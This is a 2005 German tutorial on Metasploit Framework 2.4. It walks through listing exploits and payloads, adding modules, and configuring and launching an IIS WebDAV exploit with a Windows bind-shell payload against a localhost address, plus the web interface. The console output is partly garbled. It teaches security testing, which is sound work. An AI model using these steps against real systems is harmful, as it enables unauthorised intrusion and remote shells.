## **German Metasploit Framework Tutorial**

## Inhalt

- 1. Einleitung
- 2. Exploit Datenbank
  - **Neue Exploits integrieren** 2.1.
- 3. Payload Datenbank
- 4. Konfiguration und Anwendungen eines Exploits
  - 4.1. Exploit Options
  - 4.2. Targets
  - 4.3. Payloads
  - 4.4. Exploit! Und check
- 5. MSFWeb
- 6. Einige Befehle
- 7. EOF

# 1. Einleitung

Das Metasploit Framework ist eine auf Perl basierende Entwicklungs- und Testumgebung für diverse Exploits. Dieses Tutorial beschäftigt sich mit der Windows Ausgabe in der Version 2.4 des Metasploit Framework.

http://metasploit.com/tools/framework-2.4.exe + Cygwin

## 2. Exploit Datenbank

Die Version 2.4 bietet standardmäßig 75 Exploits, welche sich in "/home/framework/exploits" befinden. Um eine detaillierte Übersicht aller bereitstehenden Exploits zubekommen geben wir in der MSFConsole den Befehle "show exploits" ein.

msf > show exploits

Metasploit Framework Loaded Exploits \_\_\_\_\_\_

| 3com_3cdaemon_ftp_overflow | 3Com 3CDaemon FTP Server Overflow          |
|----------------------------|--------------------------------------------|
| Credits                    | Metasploit Framework Credits               |
| afp_loginext               | AppleFileServer LoginExt PathName Overflow |
| aim_goaway                 | AOL Instant Messenger goaway Overflow      |
| apache_chunked_win32       | Apache Win32 Chunked Encoding              |
| arkeia_agent_access        | Arkeia Backup Client Remote Access         |
|                            |                                            |

Auf der linken Seite steht der Exploitname und auf der rechten Seite eine kurze Beschreibung.

### 2.1 Neue Exploits integrieren

Jedes für Metasploit geschriebene Exploit beinhaltet eine Code Line wie diese:

"package Msf::Exploit::php\_wordpress;"

Der Exploit Dateiname baut sich aus dem Abschnitt hinter dem zweiten Block "::" und ".pm" auf.

Also wäre in diesem Fall der Dateiname "php\_wordpress.pm". Das neue Exploit wird dann einfach nur nach "/home/framework/exploits" kopiert und steht nach dem nächsten Start der MSFConsole bereit.

#### **3. Payload Datenbank**

Mit dem Befehle **"show payloads**" werden alle 75 Payloads (Schadensfunktionen) angezeigt.

"msf > show payloads

Metasploit Framework Loaded Payloads

bsd\_ia32\_bind bsd\_ia32\_bind\_stg bsd\_ia32\_exec ..."

BSD IA32 Bind Shell BSD IA32 Staged Bind Shell BSD IA32 Execute Command

Vom Win32 Bindshell bis hin zum Mac OS RPC Reverse Shell stehen unzählige Payloads zur Verfügung. Zwar lassen sich nicht alle Exploits mit allen Payloads kombinieren aber gerade durch dieses Feature wird MSF ein sehr mächtiges Tool.

#### 4. Konfiguration und Anwendungen eines Exploits

Um ein Exploit auszuwählen gibt man folgenden Befehl, in der MSFConsole, ein: **"use exploitname**" Bsp:

msf > use iis50\_webdav\_ntdll
msf iis50\_webdav\_ntdll >

Nachdem **"use**" Befehle ist das Exploit ausgewählt. Nun tippt man den Befehle **"show**" ein und erhält eine Übersicht über die Exploit spezifischen Einstellungen, die man vornehmen kann/muss.

msf iis50\_webdav\_ntdll > show
msfconsole: show: specify 'targets', 'payloads', 'options', or 'advanced'

### 4.1 Exploit Options

Mit "**show options**" bekommen wir die Exploit Optionen angezeigt, welche wir konfigurieren müssen.

msf iis50\_webdav\_ntdll > show options

Exploit Options

| Name  | Default                           | Description                              |
|-------|-----------------------------------|------------------------------------------|
|       |                                   |                                          |
| SSL   |                                   | Use SSL                                  |
| RHOST |                                   | The target address                       |
| RPORT | 80                                | The target port                          |
|       | Name<br><br>SSL<br>RHOST<br>RPORT | Name Default<br>SSL<br>RHOST<br>RPORT 80 |

Target: Windows 2000 Bruteforce .."

Verlangt werden RHOST(Remote Host) und RPORT(Remote Port/80 ist Standard). Um diese festzulegen schreiben wir: **"set RHOST IP.des.verwundbaren.Systems**"

"msf iis50\_webdav\_ntdll > set RHOST 127.0.0.1

RHOST -> 127.0.0.1 msf iis50\_webdav\_ntdll > show options

Exploit Options

Exploit: Name Default Description optional SSL Use SSL required RHOST 127.0.0.1 The target address required RPORT 80 The target port

Die Einstellungen die wir über "**set**" vorgenommen haben, wurden erfolgreich übernommen.

## 4.2 Targets

Einige Exploits verlangen, dass man ein sog. Target (Ziel) auswählt.

msf iis50\_webdav\_ntdll > show targets

Supported Exploit Targets

0 Windows 2000 Bruteforce

msf iis50\_webdav\_ntdll > set TARGET 0 TARGET -> 0"

In diesem Fall müsste man "set TARGET 0" eintippen.

### 4.3 Payloads

Neben dem Target und den Options müssen wir auch den Payload bearbeiten. Um zusehen welche, für das Exploit verfügbaren Payloads zur Auswahl stehen, tippen wir "**show PAYLOADS**" ein.

msf iis50\_webdav\_ntdll > show PAYLOADS

Metasploit Framework Usable Payloads

win32\_bindWindows Bind Shellwin32\_bind\_dllinjectWindows Bind DLL Injectwin32\_bind\_meterpreterWindows Bind Meterpreter DLL Inject

... "

Und mit "set" wählen wir den gewünscht Payload aus.

msf iis50\_webdav\_ntdll > set PAYLOAD win32\_bind
PAYLOAD -> win32\_bind
msf iis50\_webdav\_ntdll(win32\_bind) >

In diesem Fall habe ich mich für einen Win32 Bindshell entschieden, indem ich "**set PAYLOAD win32\_bind**" eingegeben habe.

### 4.4 Exploit! und check

Nachdem wir Options, Targets und Payloads für unsere Zwecke konfiguriert haben können wir das Exploit starten, indem wir den Befehl "**exploit**" eingeben.

"

msf iis50\_webdav\_ntdll(win32\_bind) > exploit
[\*] Starting Bind Handler.
[\*] Commention to explore the second second

[\*] Connecting to web server......"

Nun wird das Exploit ausgeführt und das verwundbare System angegriffen.

Mit dem Befehle "**check**" lässt sich ein System auf die Verwundbarkeit gegen über des Exploits testen! Der "check" Befehl ist aber nicht bei allen Exploits implementiert.

### 5. MSFWeb

Um das MSF Exploit Web Interface zustarten, einfach "msfweb.bat" im Hauptverzeichnis ausführen.

"+----=[ Metasploit Framework Web Interface (127.0.0.1:55555)"

## http://127.0.0.1:55555

| Datei Bearbei       | ramework Web Console v2.4 - Mozilla Firefox                 |                                                        |                                  | -8× |
|---------------------|-------------------------------------------------------------|--------------------------------------------------------|----------------------------------|-----|
| There are a         | en Ansicht Gehe Lesezeichen Extras Hilfe                    |                                                        |                                  | 0   |
| •                   | - 🮯 🔯 🏠 🗋 http://127.0.0.1:55555/E                          | XPLOITS?MODULE=php_wordpress&PAYLOAD=cmd_generic&M     | ODE=EXPLOIT&OPT_RHOST=w 🔽 🔘 Go 🗔 |     |
| 🥘 Erste Schritt     | e 🔯 Aktuelle Nachrichte 🜀 Google                            |                                                        |                                  |     |
|                     |                                                             |                                                        |                                  |     |
|                     | EXPLOITS                                                    | PAYLOADS                                               | SESSIONS                         | 1   |
|                     |                                                             |                                                        |                                  | -   |
| Process<br>Using pa | ing exploit request (Wordpress <= 1.<br>ayload: cmd_generic | 5.1.3 Remote Code Execution eXploit)                   |                                  |     |
| Process<br>Using pa | ing exploit request (Wordpress <= 1.<br>yload: cmd_generic  | 5.1.3 Remote Code Execution eXploit)<br>Exploit Output |                                  |     |

Das Web Interface läuft auf Port 55555, Protokoll http!

Um ein Exploit über das Interface zustarten, müssen alle Konfigurationsschritte wie in der MSFConsole vorgenommen werden.

### 6. Einige Befehle

Mit dem Befehle "**help**" bekommt man eine Übersicht über alle Consolenbefehle.

msf > help

Metasploit Framework Main Console Help

\_\_\_\_\_

| ?       | Show the main console help                      |
|---------|-------------------------------------------------|
| cd      | Change working directory                        |
| exit    | Exit the console                                |
| help    | Show the main console help                      |
| info    | Display detailed exploit or payload information |
| quit    | Exit the console                                |
| reload  | Reload exploits and payloads                    |
| save    | Save configuration to disk                      |
| setg    | Set a global environment variable               |
| show    | Show available exploits and payloads            |
| unsetg  | Remove a global environment variable            |
| use     | Select an exploit by name                       |
| version | Show console version                            |
|         |                                                 |

## 7. EOF

http://metasploit.com/projects/Framework/

German Metasploit Framework Tutorial Copyright 2005 dav [ dav2600{at}gmail.com ]

<eof>